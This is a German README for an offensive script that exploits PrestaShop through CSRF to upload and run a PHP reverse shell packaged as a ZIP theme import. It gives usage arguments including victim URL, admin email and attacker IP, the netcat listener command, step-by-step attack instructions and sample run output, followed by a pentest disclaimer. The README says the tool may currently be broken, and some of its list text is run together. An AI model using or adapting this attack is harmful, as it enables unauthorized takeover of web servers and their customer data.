
Automatisiertes CSRF-Exploit-Skript für PrestaShop, das eine PHP-Reverse-Shell über eine präparierte ZIP-Nutzlast hochlädt und ausführt. Erfordert einen Netcat-Listener zum Auffangen der Verbindung.
Dieses Skript automatisiert einen CSRF-Angriff (Cross-Site Request Forgery), um eine PHP-Reverse-Shell auf den Webserver eines Ziels hochzuladen und auszuführen. Die Reverse-Shell wird als ZIP-Datei über ein manipuliertes CSRF-Payload bereitgestellt, das ausgelöst wird, wenn ein privilegierter Benutzer mit einem bestimmten Endpunkt interagiert. Das Skript erfordert eine lauschende Netcat-Instanz, um die Reverse-Shell-Verbindung abzufangen.
Scheint im Moment defekt zu sein, wird später aktualisiert
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>
target_url: Basis-URL des Ziels (z.B. https://example.com).admin_endpoint: Pfad zum Admin-Theme-Import-Endpunkt.admin_email: E-Mail-Adresse eines Administrators (zum Spoofen für das Payload).attacker_ip: IP-Adresse, auf der der Reverse-Shell-Listener die Verbindung empfängt../exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
attacker_ip und Port 9001.love.php) wird in Love-exploit.zip komprimiert.csrf_payload.html), das ein JavaScript-Skript enthält, um automatisch eine bösartige Anfrage an das Admin-Panel des Ziels zu senden, um die Reverse-Shell zu importieren.8000 stellt Love-exploit.zip zum Import bereit.Starten Sie einen Netcat-Listener auf Ihrem Rechner:
nc -nvlp 9001
Führen Sie das Skript aus:
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
Warten Sie, bis das Ziel das CSRF-Payload ausführt und die Reverse-Shell-Verbindung eingeht.
Das Skript gibt während der Ausführung folgende Informationen aus:
8000 (HTTP-Server) und 9001 (Netcat-Listener) frei sind, bevor Sie das Skript ausführen.[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...
Dieses Dokument ist für den Einsatz durch Penetrationstester und Cybersicherheitsforscher in kontrollierten Umgebungen bestimmt. Die missbräuchliche Verwendung dieses Werkzeugs für unbefugte Zwecke ist strengstens untersagt.
Dieses Skript dient ausschließlich zu Bildungszwecken und für rechtlich zulässige Cybersicherheitsbewertungen. Die unbefugte Nutzung gegen ein System ohne Erlaubnis ist illegal und verstößt gegen ethische Richtlinien.